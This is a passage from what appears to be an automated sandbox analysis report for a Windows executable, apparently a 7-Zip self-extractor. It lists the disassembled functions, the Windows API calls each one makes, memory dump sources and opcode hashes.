                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                          • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                          • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                          • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                          Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: FileTime
                                          • String ID:
                                          • API String ID: 1425588814-0
                                          • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                          • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                          • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                          • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                          Function 0040D89F Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                          • Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
                                          • Opcode Fuzzy Hash: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                          • Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
                                          Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                          • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                          • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                          • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                          Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                          • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                          • Opcode Fuzzy Hash: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                          • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                          Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                          • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                          • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                          • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                          Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                          • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                          • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                          • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                          Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                          • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                          • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                          • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                          Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                          • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                          • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                          • Instruction Fuzzy Hash:

                                          Non-executed Functions

                                          Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _wtol.MSVCRT ref: 004034E5
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                          • _wtol.MSVCRT ref: 0040367F
                                          • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                          • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                          • String ID: .lnk
                                          • API String ID: 408529070-24824748
                                          • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                          • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                          • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                          • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                          Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                          • wsprintfW.USER32 ref: 00401FFD
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                          • GetLastError.KERNEL32 ref: 00402017
                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                          • GetLastError.KERNEL32 ref: 0040204C
                                          • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                          • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                          • SetLastError.KERNEL32(00000000), ref: 00402098
                                          • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                          • _wtol.MSVCRT ref: 0040212A
                                          • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                          • String ID: 7zSfxString%d$XpA$\3A
                                          • API String ID: 2117570002-3108448011
                                          • Opcode ID: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                          • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                          • Opcode Fuzzy Hash: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                          • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                          Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                          • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                          • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                          • LockResource.KERNEL32(00000000), ref: 00401C41
                                          • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                          • wsprintfW.USER32 ref: 00401C95
                                          • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                          • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                          • API String ID: 2639302590-365843014
                                          • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                          • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                          • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                          • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                          Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                          • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                          • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                          • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                          • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                          • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                          • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                          • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                          • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                          • String ID:
                                          • API String ID: 829399097-0
                                          • Opcode ID: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                          • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                          • Opcode Fuzzy Hash: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                          • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                          Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                          • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                          • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                          • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                          • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                          • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                          • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                          • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                          • String ID:
                                          • API String ID: 1862581289-0
                                          • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                          • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                          • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                          • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                          Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                          • GetWindow.USER32(?,00000005), ref: 00406D8F
                                          • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Window$AddressLibraryLoadProc
                                          • String ID: SetWindowTheme$\EA$uxtheme
                                          • API String ID: 324724604-1613512829
                                          • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                          • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                          • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                          • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                          Function 0041022D Relevance: .5, Instructions: 501COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
